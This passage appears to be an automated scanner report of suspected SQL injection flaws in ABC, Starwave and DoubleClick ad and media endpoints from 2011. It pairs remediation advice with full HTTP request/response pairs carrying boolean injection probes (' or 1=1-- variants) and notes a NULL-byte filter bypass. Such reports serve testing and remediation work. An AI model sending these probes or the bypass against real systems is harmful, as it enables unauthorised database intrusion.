SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the application's code base.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 97170536'%20or%201%3d1--%20 and 97170536'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /service97170536'%20or%201%3d1--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 302 Moved Temporarily
Content-Length: 163
Location: http://abc.go.com/error
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed01
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:03:35 GMT
Connection: close
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error ">http://abc.go.com/error </A>.<BODY></HTML>
Request 2
GET /service97170536'%20or%201%3d2--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 17 Sep 2011 01:03:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed08
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:08:35 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Content-Length: 0
Cache-Control: max-age=300
Date: Sat, 17 Sep 2011 01:03:38 GMT
Connection: close
The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1667
Set-Cookie: id=c91da3c3c000047||t=1316221600|et=730|cs=002213fd48f445365653400eb4; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:06:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:06:40 GMT
Date: Sat, 17 Sep 2011 01:06:40 GMT
Expires: Sat, 17 Sep 2011 01:06:40 GMT
Cache-Control: private, max-age=300
<script type="text/javascript"> var spongecellParams = { clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/f/8b/%2a/i%3B243805900%3B1-0%3B0%3B67516235%3B3454-728/90%3B42127629/42145416/1%3B ...[SNIP]...
1.3. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://ad.doubleclick.net
Path: /adj/tmz.toofab.wb.dart/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad'%20and%201%3d1--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad'%20and%201%3d2--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad/sponsors'%20and%201%3d1--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad/sponsors'%20and%201%3d2--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19227397'%20or%201%3d1--%20 and 19227397'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d1--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:09 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d2--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:09 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
